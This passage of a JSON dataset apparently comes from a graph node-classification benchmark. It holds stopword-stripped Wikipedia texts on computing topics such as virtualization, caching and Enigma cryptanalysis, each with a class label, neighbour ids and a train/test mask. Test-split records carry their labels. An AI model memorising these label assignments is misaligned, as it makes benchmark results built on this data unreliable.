    "text": "BioCompute_Object:biocompute object biocompute object bco project community-driven initiative build framework standardizing sharing computations analyses generated high-throughput sequencing hts also referred next-generation sequencing ngs massively parallel sequencing mps originally started collaborative contract george washington university food drug administration project grown include 20 universities biotechnology companies public-private partnerships pharmaceutical companies including seven bridges harvard medical school bco aims ease exchange hts workflows various organizations fda pharmaceutical companies contract research organizations bioinformatic platform providers academic researchers one biggest challenges bioinformatics documenting sharing scientific workflows way computation results peer-reviewed reliably reproduced bioinformatic pipelines typically use multiple pieces software typically multiple versions available multiple input parameters multiple outputs possibly platform-specific configurations experimental parameters laboratory protocol small changes computational parameters may large impact scientific validity results biocompute framework provides object oriented design bco contains details pipeline used constructed digitally signed shared biocompute concept originally developed satisfy fda regulatory research review needs evaluation validation verification genomics data however biocompute framework follows fair data principles used broadly provide communication interoperability different platforms industries scientists regulators standardization genomic data biocompute objects mostly useful three groups users 1 academic researchers carrying new genetic experiments 2 pharma/biotech companies wish submit work fda regulatory review 3 clinical settings hospitals labs offer genetic tests personalized medicine utility academic researchers ability reproduce experimental data accurately less uncertainty utility entities wishing submit work fda streamlined approach less uncertainty ability accurately reproduce work clinical settings critical hts data clinical metadata transmitted accurate way ideally standardized way readable stakeholder including regulatory partners biocompute object json format minimum contains software versions parameters necessary evaluate verify computational pipeline may also contain input data files links reference genomes executable docker components biocompute object integrated hl7 fhir provenance resource common workflow language research object biocompute object working group facilitates means different stakeholders provide input current practices bco working group formed preparation 2017 hts computational standards regulatory sciences workshop initially made workshop participants continual growth bco working group direct result interaction variety stakeholders interested communities standardization computational hts data processing public-private partnerships formed universities private genomic data companies software platforms government regulatory institutions easy point entry new individuals institutions bco project participate discussion best practices objects",
    "neighbors": [
      9320,
      2948
    ],
    "mask": "Test"
  },
  {
    "node_id": 2332,
    "label": 2,
    "text": "Geoffrey_Knauth:geoffrey knauth geoffrey s. knauth board directors free software foundation teaches computer science lycoming college contributed gnu objective-c collection library degree economics harvard university",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      1939,
      802,
      3618,
      5555,
      9148,
      10687,
      10822,
      5703,
      5833,
      8147,
      3674,
      2010,
      10464,
      9579,
      8304,
      1394,
      8436
    ],
    "mask": "Test"
  },
  {
    "node_id": 2333,
    "label": 3,
    "text": "Who_Dares_Wins_II:dares wins ii dares wins ii run gun game developed published alligata software released 1985 commodore 64 well amstrad cpc atari 8-bit family bbc micro commodore 16 plus/4 msx zx spectrum game remake earlier dares wins given injunction accused similar commando main character lone soldier sent enemy territory wielding gun five grenades player must capture eight enemy outposts massive opposition player blow vehicles rescue prisoners level player takes long prisoners executed firing squad zzap 64 rated game 90/100 calling game fantastic landscapes incredible revisited game 7 years later gave revised rating 78/100 saying n't weathered years well still playable dion guy nintendo life called game something wished nintendo virtual console lot fun despite extremely difficult",
    "neighbors": [
      11238,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2334,
    "label": 3,
    "text": "Popek_and_Goldberg_virtualization_requirements:popek goldberg virtualization requirements popek goldberg virtualization requirements set conditions sufficient computer architecture support system virtualization efficiently introduced gerald j. popek robert p. goldberg 1974 article formal requirements virtualizable third generation architectures even though requirements derived simplifying assumptions still represent convenient way determining whether computer architecture supports efficient virtualization provide guidelines design virtualized computer architectures system virtual machines capable virtualizing full set hardware resources including processor processors memory storage resources peripheral devices virtual machine monitor vmm also called hypervisor piece software provides abstraction virtual machine three properties interest analyzing environment created vmm terminology popek goldberg vmm must present three properties terminology used reference book smith nair 2005 vmms typically assumed satisfy equivalence resource control properties additionally meeting performance property called efficient vmms popek goldberg describe characteristics instruction set architecture isa physical machine must possess order run vmms possess properties analysis derives characteristics using model third generation architectures e.g. ibm 360 honeywell 6000 dec pdp-10 nevertheless general enough extended modern machines model includes processor operates either system user mode access linear uniformly addressable memory assumed subset instruction set available system mode memory addressed relative relocation register i/o interrupts modelled derive virtualization theorems give sufficient necessary conditions virtualization popek goldberg introduce classification instructions isa 3 different groups main result popek goldberg analysis expressed follows theorem 1 conventional third-generation computer effective vmm may constructed set sensitive instructions computer subset set privileged instructions intuitively theorem states build vmm sufficient instructions could affect correct functioning vmm sensitive instructions always trap pass control vmm guarantees resource control property non-privileged instructions must instead executed natively i.e. efficiently holding equivalence property also follows theorem also provides simple technique implementing vmm called trap-and-emulate virtualization recently called classic virtualization sensitive instructions behave nicely vmm trap emulate every one related problem deriving sufficient conditions recursive virtualization conditions vmm run copy built popek goldberg present following sufficient conditions theorem 2 conventional third-generation computer recursively virtualizable architectures like non-hardware-assisted x86 meet conditions virtualized classic way architectures still fully virtualized x86 case meaning cpu mmu level using different techniques like binary translation replaces sensitive instructions generate traps sometimes called critical instructions additional processing however makes vmm less efficient theory hardware traps non-negligible performance cost well well-tuned caching binary translation system may achieve comparable performance case x86 binary translation relative first generation x86 hardware assist merely made sensitive instructions trappable effectively gives theorem different sufficiency conditions theorem 3 hybrid vmm may constructed third generation machine set user sensitive instructions subset set privileged instructions conditions isa virtualization expressed theorem 1 may relaxed expense efficiency property vmms non-virtualizable isas popek goldberg sense routinely built virtualization architectures requires correct handling critical instructions i.e. sensitive unprivileged instructions one approach known patching adopts techniques commonly used dynamic recompilation critical instructions discovered run-time replaced trap vmm various mechanisms caching emulation code hardware assists proposed make patching process efficient different approach paravirtualization requires guest operating systems modified ported running virtual environment section presents relevant architectures relate virtualization requirements pdp-10 architecture instructions sensitive alter query processor mode privileged instructions save restore condition codes containing user iot bits sensitive instructions system/370 privileged satisfies virtualization requirements motorola mc68000 single unprivileged sensitive instruction instruction sensitive allows access entire status register includes condition codes also user/supervisor bit interrupt level trace control later family members starting mc68010 move sr instruction made privileged new move ccr instruction provided allow access condition code register ia-32 instruction set pentium processor contains 18 sensitive unprivileged instructions categorized two groups introduction amd-v intel vt-x instruction sets 2005 allows x86 processors meet popek goldberg virtualization requirements effort needed support virtualization ia-64 architecture described 2000 article magenheimer christian hyperprivileged mode ultrasparc architecture specified ultrasparc architecture 2005 defines sun4v platform super-set sun4u platform still compliant sparc v9 level-1 specification sensitive instructions powerpc instruction set privileged efficiency requirement popek goldberg definition vmm concerns execution non-privileged instructions must execute natively distinguishes vmm general class hardware emulation software unfortunately even architecture meets popek goldberg requirements performance virtual machine differ significantly actual hardware early experiments performed system/370 meets formal requirements theorem 1 showed performance virtual machine could low 21 native machine benchmarks cost trapping emulating privileged instructions vmm significant led ibm engineers introduce number hardware assists roughly doubled performance system/370 virtual machines assists added several stages end 100 assists late models system/370 one main driving factors development hardware assists system/370 virtual memory guest operating system implemented virtual memory even non-privileged instructions could experience longer execution times penalty imposed requirement access translation tables used native execution see shadow page tables",
    "neighbors": [
      5378,
      5380,
      6924,
      4112,
      2073,
      8474,
      10016,
      6821,
      3630,
      7983,
      4695,
      2653,
      7134,
      7269,
      9964,
      5358,
      499,
      11636,
      7286,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 2335,
    "label": 9,
    "text": "SIOD:siod scheme one defun humorously scheme one day siod programming language dialect language lisp small-size implementation dialect scheme written c designed embedded inside c programs notable perhaps smallest practical implementation lisp-like language written george j. carrette originally free open-source software released gnu lesser general public license lgpl siod features include",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      6797,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      7421,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      1399,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      5612,
      9714,
      7670,
      11255,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2336,
    "label": 0,
    "text": "Victor_Yngve:victor yngve victor h. yngve july 5 1920 – january 15 2012 professor emeritus linguistics university chicago one earliest researchers computational linguistics natural language processing use computers analyze process languages created first program produce random well-formed output sentences given text children book called engineer small little train importantly showed computer processing terms human brain process sentences certain kind complexity ones exceed depth limit nothing length kind established independently george miller depth limit seven plus minus two sentence constituents memory given time yngve also author comit first string processing language compare snobol trac perl developed ibm 700/7000 series computers yngve collaborators mit 1957-1965 yngve created language supporting computerized research field linguistics specifically area machine translation natural language processing 1970 paper getting word edgewise yngve coined term 'back channel behavior describe conversational phenomenon day known linguistic literature back-channeling according duncan yngve paper also suggested term turn-taking independently erving goffman duncan 1972 283",
    "neighbors": [
      10569,
      1890,
      7780,
      8582
    ],
    "mask": "None"
  },
  {
    "node_id": 2337,
    "label": 3,
    "text": "Wide-issue:wide-issue wide-issue architecture computer processor issues one instruction per clock cycle considered three broad types",
    "neighbors": [
      6818,
      10669,
      6926,
      6815
    ],
    "mask": "Test"
  },
  {
    "node_id": 2338,
    "label": 7,
    "text": "Perforce:perforce perforce legally perforce software inc. minneapolis minnesota-based developer software used application development including version control software web-based repository management developer collaboration application lifecycle management agile planning software software sold helix hansoft brand names company equally owned private equity firms clearlake capital francisco partners perforce software founded 1995 alameda california christopher seiwald software developer computer science graduate uc berkeley first product also called perforce version control system allowing companies collaborate large software projects keeping track changes source code binary files june 2013 company released helix swarm tool developers working different geographical areas collaborate code review june 2014 company released version perforce versioning engine known p4d supported concurrency ability program run multiple parts concurrently march 2015 company renamed product perforce helix supported distributed development support included security features allowing suspicious usage tracking helix security capabilities included ip threat detection capabilities co-developed analytics vendor interset october company collaborated gitlab release gitswarm software tool combined github distributed workflow developers perforce single code repository february 2016 seiwald sold company investment group summit partners janet dryer named new ceo company headquarters relocated minneapolis november perforce announced acquisition seapine software provider application lifecycle management alm tools seapine testtrack alm software rebranded helix alm september 2017 company acquired uppsala sweden-based hansoft developer agile planning software also september perforce announced acquired finnish repository management services company deveo deveo products merged perforce helix teamhub first solo venture git-based development teams january 2018 summit partners sold perforce private equity firm clearlake capital may perforce acquired uk-based programming research prqa static code analysis firm june company announced ceo janet dryer moving role chair board coo/cfo mark ties taking role ceo october company acquired mobile web automation testing company perfecto january 2019 perforce announced acquisition rogue wave software software company focus development tools high-performance computing april 2019 private equity firm francisco partners acquired 50 perforce becoming equal partner clearlake capital perforce develops software used software developers manage code development process product line includes following helix core formerly perforce helix company versioning control engine large scale development environments helix version control system manages central database master repository file versions helix core clients fall roughly five categories git command gui web plugin perforce system make part content available git repositories users git clients work file content history git commits visible users clients perforce changelists vice versa users submit changed files together changelists applied atomic commits server client software released pre-built executables microsoft windows macos linux solaris freebsd operating systems helix alm formerly testtrack suite tools used application lifecycle management alm allowing developers manage product system development phases one product software originally developed seapine software acquired perforce rebranded helix alm provides centralized suite capabilities managing requirements defects issues testing throughout software development cycle three components suite company develops helix qac static code analysis software tool c c++ programming languages perforce customers software developers wide variety companies including netflix sap disney intuit nyse company considered leader gaming space 18 top 20 games developers including ubisoft electronic arts using perforce version control company headquartered minneapolis minnesota november 2017 listed additional offices alameda california mason ohio hallbergmoos germany helsinki finland sydney australia uppsala sweden wokingham england",
    "neighbors": [
      2432,
      2465,
      162,
      7425,
      11256,
      6154,
      4919,
      6797,
      7983,
      9070,
      6993,
      119,
      2901,
      823,
      1304,
      5210,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2339,
    "label": 3,
    "text": "Cache_(computing):cache computing computing cache aue hardware software component stores data future requests data served faster data stored cache might result earlier computation copy data stored elsewhere cache hit occurs requested data found cache cache miss occurs cache hits served reading data cache faster recomputing result reading slower data store thus requests served cache faster system performs cost-effective enable efficient use data caches must relatively small nevertheless caches proven many areas computing typical computer applications access data high degree locality reference access patterns exhibit temporal locality data requested recently requested already spatial locality data requested stored physically close data already requested inherent trade-off size speed given larger resource implies greater physical distances also tradeoff expensive premium technologies sram vs cheaper easily mass-produced commodities dram hard disks buffering provided cache benefits bandwidth latency larger resource incurs significant latency access e.g take hundreds clock cycles modern 4 ghz processor reach dram mitigated reading large chunks hope subsequent reads nearby locations prediction explicit prefetching might also guess future reads come make requests ahead time done correctly latency bypassed altogether use cache also allows higher throughput underlying resource assembling multiple fine grain transfers larger efficient requests case dram circuits might served wider data bus example consider program accessing bytes 32-bit address space served 128-bit off-chip data bus individual uncached byte accesses would allow 1/16th total bandwidth used 80 data movement would memory addresses instead data reading larger chunks reduces fraction bandwidth required transmitting address information hardware implements cache block memory temporary storage data likely used central processing units cpus hard disk drives hdds frequently use cache web browsers web servers cache made pool entries entry associated data copy data backing store entry also tag specifies identity data backing store entry copy cache client cpu web browser operating system needs access data presumed exist backing store first checks cache entry found tag matching desired data data entry used instead situation known cache hit example web browser program might check local cache disk see local copy contents web page particular url example url tag content web page data percentage accesses result cache hits known hit rate hit ratio cache alternative situation cache checked found contain entry desired tag known cache miss requires expensive access data backing store requested data retrieved typically copied cache ready next access cache miss previously existing cache entry removed order make room newly retrieved data heuristic used select entry replace known replacement policy one popular replacement policy least recently used lru replaces oldest entry entry accessed less recently entry see cache algorithm efficient caching algorithms compute use-hit frequency size stored contents well latencies throughputs cache backing store works well larger amounts data longer latencies slower throughputs experienced hard drives networks efficient use within cpu cache system writes data cache must point write data backing store well timing write controlled known write policy two basic writing approaches write-back cache complex implement since needs track locations written mark dirty later writing backing store data locations written back backing store evicted cache effect referred lazy write reason read miss write-back cache requires block replaced another often require two memory accesses service one write replaced data cache back store one retrieve needed data policies may also trigger data write-back client may make many changes data cache explicitly notify cache write back data since data returned requester write operations decision needs made write misses whether data would loaded cache defined two approaches write-through write-back policies use either write-miss policies usually paired way entities cache may change data backing store case copy cache may become out-of-date stale alternatively client updates data cache copies data caches become stale communication protocols cache managers keep data consistent known coherency protocols small memories close cpu operate faster much larger main memory cpus since 1980s used one caches sometimes cascaded levels modern high-end embedded desktop server microprocessors may many six types cache levels functions examples caches specific function d-cache i-cache translation lookaside buffer mmu earlier graphics processing units gpus often limited read-only texture caches introduced morton order swizzled textures improve 2d cache coherency cache misses would drastically affect performance e.g mipmapping used caching important leverage 32-bit wider transfers texture data often little 4 bits per pixel indexed complex patterns arbitrary uv coordinates perspective transformations inverse texture mapping gpus advanced especially gpgpu compute shaders developed progressively larger increasingly general caches including instruction caches shaders exhibiting increasingly common functionality cpu caches example gt200 architecture gpus feature l2 cache fermi gpu 768 kb last-level cache kepler gpu 1536 kb last-level cache maxwell gpu 2048 kb last-level cache caches grown handle synchronisation primitives threads atomic operations interface cpu-style mmu digital signal processors similarly generalised years earlier designs used scratchpad memory fed dma modern dsps qualcomm hexagon often include similar set caches cpu e.g modified harvard architecture shared l2 split l1 i-cache d-cache memory management unit mmu fetches page table entries main memory specialized cache used recording results virtual address physical address translations specialized cache called translation lookaside buffer tlb cpu caches generally managed entirely hardware variety software manages caches page cache main memory example disk cache managed operating system kernel disk buffer integrated part hard disk drive sometimes misleadingly referred disk cache main functions write sequencing read prefetching repeated cache hits relatively rare due small size buffer comparison drive capacity however high-end disk controllers often on-board cache hard disk drive data blocks finally fast local hard disk drive also cache information held even slower data storage devices remote servers web cache local tape drives optical jukeboxes scheme main concept hierarchical storage management also fast flash-based solid-state drives ssds used caches slower rotational-media hard disk drives working together hybrid drives solid-state hybrid drives sshds web browsers web proxy servers employ web caches store previous responses web servers web pages images web caches reduce amount information needs transmitted across network information previously stored cache often re-used reduces bandwidth processing requirements web server helps improve responsiveness users web web browsers employ built-in web cache internet service providers isps organizations also use caching proxy server web cache shared among users network another form cache p2p caching files sought peer-to-peer applications stored isp cache accelerate p2p transfers similarly decentralised equivalents exist allow communities perform task p2p traffic example corelli cache store data computed demand rather retrieved backing store memoization optimization technique stores results resource-consuming function calls within lookup table allowing subsequent calls reuse stored results avoid repeated computation related dynamic programming algorithm design methodology also thought means caching bind dns daemon caches mapping domain names ip addresses resolver library write-through operation common operating unreliable networks like ethernet lan enormous complexity coherency protocol required multiple write-back caches communication unreliable instance web page caches client-side network file system caches like nfs smb typically read-only write-through specifically keep network protocol simple reliable search engines also frequently make web pages indexed available cache example google provides cached link next search result prove useful web pages web server temporarily permanently inaccessible another type caching storing computed results likely needed memoization example ccache program caches output compilation order speed later compilation runs database caching substantially improve throughput database applications example processing indexes data dictionaries frequently used subsets data distributed cache uses networked hosts provide scalability reliability performance application hosts co-located spread different geographical regions semantics buffer cache totally different even fundamental differences intent process caching process buffering fundamentally caching realizes performance increase transfers data repeatedly transferred caching system may realize performance increase upon initial typically write transfer data item performance increase due buffering occurring within caching system read caches data item must fetched residing location least order subsequent reads data item realize performance increase virtue able fetched cache faster intermediate storage rather data residing location write caches performance increase writing data item may realized upon first write data item virtue data item immediately stored cache intermediate storage deferring transfer data item residing storage later stage else occurring background process contrary strict buffering caching process must adhere potentially distributed cache coherency protocol order maintain consistency cache intermediate storage location data resides buffering hand typical caching implementations data item read written first time effectively buffered case write mostly realizing performance increase application write originated additionally portion caching protocol individual writes deferred batch writes form buffering portion caching protocol individual reads deferred batch reads also form buffering although form may negatively impact performance least initial reads even though may positively impact performance sum individual reads practice caching almost always involves form buffering strict buffering involve caching buffer temporary memory location traditionally used cpu instructions directly address data stored peripheral devices thus addressable memory used intermediate stage additionally buffer may feasible large block data assembled disassembled required storage device data may delivered different order produced also whole buffer data usually transferred sequentially example hard disk buffering sometimes increases transfer performance reduces variation jitter transfer latency opposed caching intent reduce latency benefits present even buffered data written buffer read buffer cache also increases transfer performance part increase similarly comes possibility multiple small transfers combine one large block main performance-gain occurs good chance data read cache multiple times written data soon read cache sole purpose reduce accesses underlying slower storage cache also usually abstraction layer designed invisible perspective neighboring layers",
    "neighbors": [
      7173,
      9739,
      5649,
      2066,
      7699,
      5655,
      2586,
      541,
      10781,
      8231,
      9770,
      7218,
      52,
      566,
      10811,
      3645,
      3646,
      2623,
      2113,
      7234,
      3142,
      6221,
      2638,
      1106,
      1623,
      1122,
      4708,
      10340,
      3175,
      8295,
      9834,
      8815,
      624,
      4725,
      630,
      3702,
      8822,
      8825,
      6268,
      9343,
      3203,
      6277,
      8328,
      3725,
      10382,
      7313,
      3219,
      154,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      10926,
      9391,
      7858,
      7347,
      9907,
      9911,
      2234,
      1723,
      8379,
      8890,
      4286,
      2241,
      3265,
      2243,
      10433,
      1736,
      4811,
      5840,
      5329,
      10966,
      731,
      9435,
      734,
      11487,
      225,
      740,
      10469,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      9466,
      5371,
      8700,
      3326,
      1791,
      6403,
      1798,
      2827,
      6926,
      6415,
      9489,
      1298,
      11552,
      6950,
      810,
      7983,
      1841,
      309,
      8501,
      6970,
      5948,
      4928,
      8514,
      2887,
      1353,
      6476,
      2383,
      5967,
      7505,
      9044,
      2901,
      11604,
      2395,
      860,
      8543,
      1376,
      9568,
      5474,
      11618,
      10603,
      876,
      7022,
      4465,
      6003,
      6515,
      2421,
      1399,
      2937,
      1402,
      7033,
      380,
      6013,
      6014,
      11134,
      2945,
      3457,
      9092,
      6023,
      398,
      910,
      3470,
      6033,
      9616,
      5523,
      5013,
      407,
      2456,
      9631,
      10658,
      2979,
      9126,
      935,
      5547,
      10669,
      7086,
      1967,
      2480,
      8624,
      8625,
      8115,
      10675,
      1461,
      1463,
      7607,
      4030,
      3520,
      8640,
      3522,
      8644,
      3014,
      3534,
      466,
      2515,
      2517,
      1499,
      1502,
      5598,
      5090,
      995,
      10725,
      3562,
      9707,
      10734,
      6639,
      11250,
      499,
      4596,
      8186,
      6652
    ],
    "mask": "Test"
  },
  {
    "node_id": 2340,
    "label": 8,
    "text": "HitDynamics:hitdynamics hitdynamics provider web analytics software allowing website owners track traffic sites ascertain traffic sources deliver conversions sales company founded internet entrepreneur max polyakov january 2005 acquired 6 march 2006 hitwise company technology exists web analytics arm hitwise suite cupid plc also founded max polyakov",
    "neighbors": [
      6576
    ],
    "mask": "None"
  },
  {
    "node_id": 2341,
    "label": 4,
    "text": "Zygalski_sheets:zygalski sheets method zygalski sheets cryptologic technique used polish cipher bureau world war ii war also british cryptologists bletchley park decrypt messages enciphered german enigma machines zygalski-sheet apparatus takes name polish cipher bureau mathematician–cryptologist henryk zygalski invented october 1938 zygalski device comprised set 26 perforated sheets initially six possible sequences inserting three rotors enigma machine scrambler sheet related starting position left slowest-moving rotor 26 × 26 matrix represented 676 possible starting positions middle right rotors duplicated horizontally vertically a–z a–y sheets punched holes positions would allow female occur polish mathematician–cryptologist marian rejewski writes perforated-sheets device operated like rejewski card-catalog method developed using cyclometer zygalski-sheet procedure independent number plugboard plug connections enigma machine cipher bureau manual manufacture sheets security reasons done mathematician-cryptologists using razor blades time-consuming 15 december 1938 third job finished date germans introduced rotors iv v thus increasing labor making sheets tenfold since ten times many sheets needed 60 possible combinations sequences enigma machine 3 rotors selected among 5 25 july 1939 five weeks outbreak world war ii polish general staff cipher bureau disclosed french british allies warsaw cryptologic achievements breaking enigma ciphers part disclosures involved zygalski perforated-sheet method british bletchley park near london england undertook production two complete sets perforated sheets work done aid perforators section headed john r.f jeffreys sheets known bletchley netz netzverfahren net method though later remembered gordon welchman jeffreys sheets latter term however referred another catalog produced jeffreys section first set completed late december 1939 28 december part second set delivered polish cryptologists escaped german-overrun poland pc bruno outside paris france remaining sheets completed 7 january 1940 couriered alan turing france shortly thereafter help writes rejewski continued solving enigma daily keys sheets used poles make first wartime decryption enigma message 17 january 1940 may 1940 germans completely changed procedure enciphering message keys exception norwegian network result zygalski sheets use though herivel tip could still used",
    "neighbors": [
      7416,
      9156,
      8318
    ],
    "mask": "Test"
  },
  {
    "node_id": 2342,
    "label": 3,
    "text": "Abracadabra_(video_game):abracadabra video game abracadabra text adventure game developed odisea software published proein soft line spanish amstrad cpc msx zx spectrum 1988 year 1209 knight named clus d'eledorf bewitched jealous queen saligia enamored become ghost haunting castle burgenfels would confess love game divided two parts part one clus find way rid witch break curse escape prison second part clus needs seek rescue beloved princess violeta greenwald forest game well received spanish video game press microhobby called excellent game high level graphic quality importantly stunning setting realization fantasy adventure game provides elements necessary satisfy even demanding fans genre micromania gave score 8/10 caad opined among adventures existing spanish market one definitely best",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2343,
    "label": 4,
    "text": "US_Cyber_Challenge:us cyber challenge us cyber challenge private-public partnership program dedicated finding high level cybersecurity talent endeavor significantly reduce shortage today cyber workforce program identifies attracts recruits trains next generation cybersecurity professionals us cyber challenge currently program council cybersecurity center internet security us cyber challenge founded 2010 karen s. evans former administrator office electronic government information technology office management budget mission us cyber challenge fill workforce gap cybersecurity professionals process assessment training employment networking summer 2015 us cyber challenge hosted four camps across country two camps statewide camps located delaware illinois two camps regional camps located virginia eastern regional utah western regional camp schedule order qualify invitation one four cyber camps individuals must compete online qualifying competition cyber quests 2015 cyber quests schedule",
    "neighbors": [
      3994
    ],
    "mask": "Test"
  },
  {
    "node_id": 2344,
    "label": 1,
    "text": "Query_plan:query plan query plan query execution plan ordered set steps used access data sql relational database management system specific case relational model concept access plans since sql declarative typically large number alternative ways execute given query widely varying performance query submitted database query optimizer evaluates different correct possible plans executing query returns considers best option query optimizers imperfect database users administrators sometimes need manually examine tune plans produced optimizer get better performance given database management system may offer one mechanisms returning plan given query packages feature tools generate graphical representation query plan tools allow special mode set connection cause dbms return textual description query plan another mechanism retrieving query plan involves querying virtual database table executing query examined oracle instance achieved using explain plan statement textual plan given query screenshot shown indicates query engine scan primary key index employee table matching seek primary key index contactid column contact table find matching rows resulting rows side shown nested loops join operator sorted returned result set connection order tune query user must understand different operators database may use ones might efficient others still providing semantically correct query results reviewing query plan present opportunities new indexes changes existing indexes also show database properly taking advantage existing indexes see query optimizer query optimizer always choose efficient query plan given query databases query plan reviewed problems found query optimizer gives hints improve databases alternatives express query queries return results tried query tools generate embedded hints query use optimizer databases like oracle provide plan table query tuning plan table return cost time executing query oracle offers two optimization approaches rbo slowly deprecated cbo used tables referenced query must analyzed analyze table dba launch code dbms_stats package tools query optimization include",
    "neighbors": [
      10632,
      8201,
      10505,
      8979,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      4255,
      9248,
      9631,
      9634,
      11552,
      1447,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      3004,
      3388,
      1341,
      7868,
      10048,
      2369,
      5953,
      6850,
      580,
      11324,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      8799,
      4065,
      9828,
      10340,
      10471,
      8808,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      7412,
      1146,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 2345,
    "label": 2,
    "text": "Computer_multitasking:computer multitasking computing multitasking concurrent execution multiple tasks also known processes certain period time new tasks interrupt already started ones finish instead waiting end result computer executes segments multiple tasks interleaved manner tasks share common processing resources central processing units cpus main memory multitasking automatically interrupts running program saving state partial results memory contents computer register contents loading saved state another program transferring control context switch may initiated fixed time intervals pre-emptive multitasking running program may coded signal supervisory software interrupted cooperative multitasking multitasking require parallel execution multiple tasks exactly time instead allows one task advance given period time even multiprocessor computers multitasking allows many tasks run cpus multitasking common feature computer operating systems allows efficient use computer hardware program waiting external event user input input/output transfer peripheral complete central processor still used another program time-sharing system multiple human operators use processor dedicated use behind scenes computer serving many users multitasking individual programs multiprogramming systems task runs must wait external event operating system scheduler forcibly swaps running task cpu real-time systems designed control industrial robots require timely processing single processor might shared calculations machine movement communications user interface often multitasking operating systems include measures change priority individual tasks important jobs receive processor time considered less significant depending operating system task might large entire application program might made smaller threads carry portions overall program processor intended use multitasking operating systems may include special hardware securely support multiple tasks memory protection protection rings ensure supervisory software damaged subverted user-mode program errors term multitasking become international term word used many languages german italian dutch danish norwegian early days computing cpu time expensive peripherals slow computer ran program needed access peripheral central processing unit cpu would stop executing program instructions peripheral processed data usually inefficient first computer using multiprogramming system british leo iii owned j. lyons co. batch processing several different programs loaded computer memory first one began run first program reached instruction waiting peripheral context program stored away second program memory given chance run process continued programs finished running use multiprogramming enhanced arrival virtual memory virtual machine technology enabled individual programs make use memory operating system resources concurrently running programs practical purposes non-existent invisible multiprogramming n't give guarantee program run timely manner indeed first program may well run hours without needing access peripheral users waiting interactive terminal problem users handed deck punched cards operator came back hours later printed results multiprogramming greatly reduced wait times multiple batches processed early multitasking systems used applications voluntarily ceded time one another approach eventually supported many computer operating systems known today cooperative multitasking although rarely used larger systems except specific applications cics jes2 subsystem cooperative multitasking scheduling scheme employed microsoft windows classic mac os enable multiple applications run simultaneously cooperative multitasking still used today risc os systems cooperatively multitasked system relies process regularly giving time processes system one poorly designed program consume cpu time either performing extensive calculations busy waiting would cause whole system hang server environment hazard makes entire environment unacceptably fragile preemptive multitasking allows computer system reliably guarantee process regular slice operating time also allows system deal rapidly important external events like incoming data might require immediate attention one another process operating systems developed take advantage hardware capabilities run multiple processes preemptively preemptive multitasking implemented pdp-6 monitor multics 1964 os/360 mft 1967 unix 1969 available operating systems computers small dec pdp-8 core feature unix-like operating systems linux solaris bsd derivatives well modern versions windows specific time processes grouped two categories waiting input output called i/o bound fully utilizing cpu cpu bound primitive systems software would often poll busywait waiting requested input disk keyboard network input time system performing useful work advent interrupts preemptive multitasking i/o bound processes could blocked put hold pending arrival necessary data allowing processes utilize cpu arrival requested data would generate interrupt blocked processes could guaranteed timely return execution earliest preemptive multitasking os available home users sinclair qdos sinclair ql released 1984 people bought machine commodore amiga released following year first commercially successful home computer use technology multimedia abilities make clear ancestor contemporary multitasking personal computers microsoft made preemptive multitasking core feature flagship operating system early 1990s developing windows nt 3.1 windows 95 later adopted apple macintosh mac os x unix-like operating system uses preemptive multitasking native applications similar model used windows 9x windows nt family native 32-bit applications multitasked preemptively 64-bit editions windows x86-64 itanium architectures longer support legacy 16-bit applications thus provide preemptive multitasking supported applications another reason multitasking design real-time computing systems number possibly unrelated external activities needed controlled single processor system systems hierarchical interrupt system coupled process prioritization ensure key activities given greater share available process time multitasking greatly improved throughput computers programmers started implement applications sets cooperating processes e. g. one process gathering input data one process processing input data one process writing results disk however required tools allow processes efficiently exchange data threads born idea efficient way cooperating processes exchange data would share entire memory space thus threads effectively processes run memory context share resources parent processes open files threads described lightweight processes switching threads involve changing memory context threads scheduled preemptively operating systems provide variant threads named fibers scheduled cooperatively operating systems provide fibers application may implement fibers using repeated calls worker functions fibers even lightweight threads somewhat easier program although tend lose benefits threads machines multiple processors systems directly support multithreading hardware essential multitasking system safely effectively share access system resources access memory must strictly managed ensure process inadvertently deliberately read write memory locations outside process address space done purpose general system stability data integrity well data security general memory access management responsibility operating system kernel combination hardware mechanisms provide supporting functionalities memory management unit mmu process attempts access memory location outside memory space mmu denies request signals kernel take appropriate actions usually results forcibly terminating offending process depending software kernel design specific error question user may receive access violation error message segmentation fault well designed correctly implemented multitasking system given process never directly access memory belongs another process exception rule case shared memory example system v inter-process communication mechanism kernel allocates memory mutually shared multiple processes features often used database management software postgresql inadequate memory protection mechanisms either due flaws design poor implementations allow security vulnerabilities may potentially exploited malicious software use swap file swap partition way operating system provide memory physically available keeping portions primary memory secondary storage multitasking memory swapping two completely unrelated techniques often used together swapping memory allows tasks loaded time typically multitasking system allows another process run running process hits point wait portion 